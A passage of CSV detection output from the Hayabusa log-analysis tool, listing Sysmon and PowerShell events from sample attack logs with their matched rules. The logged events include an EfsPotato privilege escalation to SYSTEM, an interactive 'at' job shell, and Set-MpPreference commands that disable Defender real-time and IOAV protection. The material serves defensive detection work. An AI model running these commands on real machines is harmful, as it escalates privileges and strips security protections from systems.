747F3D96-183B-610F-0000-0010DC6CD400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:15.303 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-22 19:33:38.725 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: c:\temp\EfsPotato.exe whoami | Process: C:\temp\EfsPotato.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.725 +00:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.844 +00:00,LAPTOP-JU4M3I0E,17,info,,Pipe Created,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: c:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.844 +00:00,LAPTOP-JU4M3I0E,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/pipe_created_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.881 +00:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.884 +00:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.884 +00:00,LAPTOP-JU4M3I0E,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/pipe_created_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.905 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\temp\EfsPotato.exe whoami | LID: 0x3e7 | PID: 11328 | PGUID: 00247C92-A692-6122-0000-0010A5CD1F02,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.905 +00:00,LAPTOP-JU4M3I0E,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.905 +00:00,LAPTOP-JU4M3I0E,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.905 +00:00,LAPTOP-JU4M3I0E,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.905 +00:00,LAPTOP-JU4M3I0E,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.997 +00:00,LAPTOP-JU4M3I0E,5,info,,Process Terminated,Process: C:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:40.014 +00:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:40.014 +00:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.250 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p | LID: 0xbf9eb | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.303 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140_1.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=58D562E8E3496A97E0CFE34C64B7AC79F40A9367,MD5=639584D9FCDC54D7644328650028F453,SHA256=4EF85487DE3B07AB52D269A51CFC2499C2E77ECBE2C63EC556F2C59AAD311B81,IMPHASH=AE0BDE6314FA2027B54CE04898F6AB69",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.315 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\UpdateRingSettings.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=50FBFD34BCB3A0CDCAE94D963AF6DA5B6EAAF702,MD5=E5783051077ECC0CF81051ACC6C7872D,SHA256=8E63CC1DDD7C554532FB00A2E3198D712ED19DD64EF6818119AFC2A5214148A8,IMPHASH=8B31BD73AB0C52BD4506C09FDABE59CE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.324 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\LoggingPlatform.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=479CD840A5352F76051B5722E4CD9004C72567EC,MD5=090BBA421A213F67FBFE10231116E008,SHA256=1E8923D71C32876B53A887983C63BC94914AB91CAAF1E13D3979F64F529DD043,IMPHASH=D39A0141F3324CB1CE047427FD20FCEA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.335 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.342 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.344 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.350 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.355 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.513 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\OneDriveTelemetryStable.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=8D3D5F03E129C08F890847F7B12E620F9315B396,MD5=B01D2385E32F4251399C7EDCE8364967,SHA256=5E6CC575BEC320E4502B48B1050FE255BF6504013FAA6EE62A80707E3092383E,IMPHASH=C719A37B3234505BC0AADBB7DE7C9654",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.545 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileSyncTelemetryExtensions.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=B535176F0E42CE3DEE9F650070AB1CAEA840CFBF,MD5=68E4FB636BC56B74BF54F18223238862,SHA256=1084C4AF96A06F8A84CA279C659394ACB1BC80D1F5DBC16EB62964C5632C41A0,IMPHASH=D207E97F105829D9C63E79F98B136D2B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.931 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuthLib64.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=FFFD189CF1234EC54392F57C8D6D683A92DEB2B4,MD5=5E3A74A8E0295B1396C1A5D5D5C0664F,SHA256=E0132392E8014B120BBF51F2E98E9BB329877666A7D005353A4E96DF14DFFD4C,IMPHASH=592278570E604A14992850A5B210142D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-10-01 17:30:39.083 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: at 13:20 /interactive cmd | Path: C:\Windows\System32\at.exe | PID: 0x15cc | User: admmig | LID: 0x65b0f5db,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Interactive shell using AT schedule task.evtx +2021-10-01 17:30:39.083 +00:00,fs01.offsec.lan,4688,high,PrivEsc,Interactive AT Job,,rules/sigma/process_creation_builtin/proc_creation_win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Interactive shell using AT schedule task.evtx +2021-10-06 09:34:50.487 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.513 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableRealtimeMonitoring $true,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.787 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.788 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.794 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.797 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.805 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.881 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableIOAVProtection $true,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.962 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" 